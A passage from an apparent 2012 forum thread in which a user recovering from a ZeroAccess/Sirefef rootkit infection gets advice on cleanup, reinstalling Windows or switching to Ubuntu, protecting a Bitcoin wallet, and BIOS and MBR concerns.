know. cheers
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 11:37:29 PM
It was ZeroAccess.
I'll update soon: I'm running some scans to make sure the rootkit is completely gone.
Firefox redirected the worst (on load and nearly every search result). IE also redirected. Chromium refused to work until recently (it wouldn't connect to anything).
Update:
ZeroAccess is apparently a rootkit that uses a variety of techniques to circumvent UAC by injecting code into UAC exceptions. I had not realized the dangers of keeping UAC at the "recommended" level, believing it to be sufficient in preventing malware. UAC is now set at the highest level.
ZeroAccess also downloaded a Bitcoin-related trojan (this is what most worries me). At this point, all my bitcoin is still present and remains encrypted. This was the cause of the slow computer; the bitcoin trojan converted it into a botnet.
ZeroAccess deleted some important services. Most importantly, Windows Update and Windows Firewall have been deleted. I will probably do a repair install, as a system restore seems too risky (what if it restores the rootkit?).
At this point, ZeroAccess should have been removed. At the very least, its symptoms are no longer present.
Edit: Windows Update has been restored (I needed to reregister the services, but the dlls were not deleted). I have reinstalled MSE and the computer should be much safer now. Now, I'm trying to fix Windows firewall, which isn't as crucial as the other two.
Title: Re: Windows infection: please help a security newbie
Post by: rjk on July 24, 2012, 03:07:07 AM
Personally, I never trust an infected computer ever again. All kinds of shit happens that's easy to miss and will cause future problems. If you hold any significant amount of bitcoins, it would be a good idea to move tem to a known secure computer. And I mean move the encrypted wallet without first decrypting it, since you can't be sure there isn't a lingering keylogger or some shit like that.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 24, 2012, 03:12:43 AM
I have rediscovered an even more serious infection. This time, some core Windows system files were damaged.
"Windows has encountered a critical problem and will restart in one minute".
Yes, even in safe mode.
I have resorted to system restore, which has fixed the critical problem (additionally, all services have been restored). MSE is currently running, but only so I can gain some experience on how to deal with a severe infection.
At this point, I am simply going to install Ubuntu tommorow. After dealing with ZeroAccess, this newly discovered and even worse infection will simply be an exercise to remove.
Title: Re: Windows infection: please help a security newbie
Post by: myrkul on July 24, 2012, 03:17:30 AM
At this point, I am simply going to install Ubuntu tommorow. After dealing with ZeroAccess, this newly discovered and even worse infection will simply be an exercise to remove.
Windows, your days are numbered! http://www.youtube.com/watch?v=CWsJcg-g1pg That said, the most recent Ubuntu is not my favorite. Unity... ick. But its a great Linux beginner OS.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 24, 2012, 03:21:34 AM
Sirefef is the trojan's name. I think it's currently under control (quarentined by MSE, which is saved by the system restore). At this point, I am simply going to install Ubuntu tommorow. After dealing with ZeroAccess, this newly discovered and even worse infection will simply be an exercise to remove.
Windows, your days are numbered! http://www.youtube.com/watch?v=CWsJcg-g1pg That said, the most recent Ubuntu is not my favorite. Unity... ick. But its a great Linux beginner OS. I wish there was audio in safe mode now. Ubuntu is good enough for me, because I've actually used it before. Edit: Wow, these viruses are good. They just deleted the Windows Security Centre service... in Safe Mode. The reason this is so significant is that that is not a service that can even start in Safe Mode.
Title: Re: Windows infection: please help a security newbie
Post by: check_status on July 24, 2012, 05:03:38 AM
Well, there are both benefits and disadvantages to using Linux. Linux does have malware, rootkits, worms, trojans, privilage escalation, vulnerabilities. The benefits of Linux are that the majority of the malware attacks always start in user space, the disadvantage is tools are not well discussed so newbies can acquire improved security. Often, security questions are met with responses like, "Your on Linux now, stop worrying, there is no malware here, just move along...". Little do they know, there question was being answered by a Blackhat, who isn't interested in helping to reduce his ability to pwn your box. Because of this atmosphere that "Linux is immune", it makes detecting an infection or security threat much harder for a newb than it is in Windows. Ask yourself this, If a rootkit/worm/trojan/keylogger were running in your Linux system, how would I find it? Now see how many people will teach you how to look for the signs. While Linux is better at default security than Windows, the length of time an infection will go undiscovered by a newb on Linux will be much longer, if infected.
Title: Re: Windows infection: please help a security newbie
Post by: myrkul on July 24, 2012, 05:16:05 AM
Well, there are both benefits and disadvantages to using Linux. Linux does have malware, rootkits, worms, trojans, privilage escalation, vulnerabilities. Yes, and Ubuntu is starting to get big enough to be a targetable audience. (ie, it's worth the hacker's time). But the very nature of the Linux ecosystem makes it harder to program a single bug that will infect everyone, and the open-source nature and upstream fixes makes any holes shorter-lived. No system is 100% secure. But compared to Windows, Linux might as well be. (Especially if, like me, you use some off-brand Linux, and keep everything updated.)
Title: Re: Windows infection: please help a security newbie
Post by: Vladimir on July 24, 2012, 05:16:59 AM
Whether you like it or not, wipe all and reinstall is what you need to do.
Title: Re: Windows infection: please help a security newbie
Post by: 01BTC10 on July 24, 2012, 05:37:25 AM
Whether you like it or not, wipe all and reinstall is what you need to do.
+1 And some very specialised rootkit can even infect the BIOS so in a company environment you need to flash the BIOS before reinstall. You can't trust a computer that have ever been infected. http://www.tomshardware.com/news/bios-virus-rootkit-security-backdoor,7400.html
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 24, 2012, 04:48:19 PM
Whether you like it or not, wipe all and reinstall is what you need to do.
+1 And some very specialised rootkit can even infect the BIOS so in a company environment you need to flash the BIOS before reinstall. You can't trust a computer that have ever been infected. http://www.tomshardware.com/news/bios-virus-rootkit-security-backdoor,7400.html If I'm going to be switching OS's, should I still worry about this?
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 24, 2012, 05:21:32 PM
Whether you like it or not, wipe all and reinstall is what you need to do.
+1 And some very specialised rootkit can even infect the BIOS so in a company environment you need to flash the BIOS before reinstall. You can't trust a computer that have ever been infected. http://www.tomshardware.com/news/bios-virus-rootkit-security-backdoor,7400.html If I'm going to be switching OS's, should I still worry about this? def +1 to what Vlad and 01BTC10 are saying. You seem to have some fairly uncommon nastie son your machine. It probably would not hurt at all to boot from a floppy or livecd made from another mahcine and flash the bios. Also, when you do format the drive to reinstall make sure to format /MBR and format /S as well from a known clean disk. nasty stuff there, m8 If that was in my shop, I'd probably just destroy the HDD, replace the mobo and rest comfortably versus wondering IF there is some more advanced infection invloved.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 24, 2012, 05:34:12 PM
Whether you like it or not, wipe all and reinstall is what you need to do.
+1 And some very specialised rootkit can even infect the BIOS so in a company environment you need to flash the BIOS before reinstall. You can't trust a computer that have ever been infected. http://www.tomshardware.com/news/bios-virus-rootkit-security-backdoor,7400.html If I'm going to be switching OS's, should I still worry about this? def +1 to what Vlad and 01BTC10 are saying. You seem to have some fairly uncommon nastie son your machine. It probably would not hurt at all to boot from a floppy or livecd made from another mahcine and flash the bios. Also, when you do format the drive to reinstall make sure to format /MBR and format /S as well from a known clean disk. nasty stuff there, m8 If that was in my shop, I'd probably just destroy the HDD, replace the mobo and rest comfortably versus wondering IF there is some more advanced infection invloved. I'd rather not risk killing the BIOS to remove something that a) probably isn't there and b) probably doesn't matter. Why should I format the MBR? Won't that destroy the partition table?
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 24, 2012, 05:43:28 PM
Why should I format the MBR? Won't that destroy the partition table?
Why yes, yes it will amongst other things. Windows has no issues installing to an unpartioned drive. It will allow you to add the partitions at the same screen where you would pick the drive when you're installing. Just click advanced. When you get reinstalled, you could atleast check the bios. From your windows based BIOS app (most mobos these days have one), do a backup of the BIOS and compare it to a download from the vendor site of the same version. cheers
|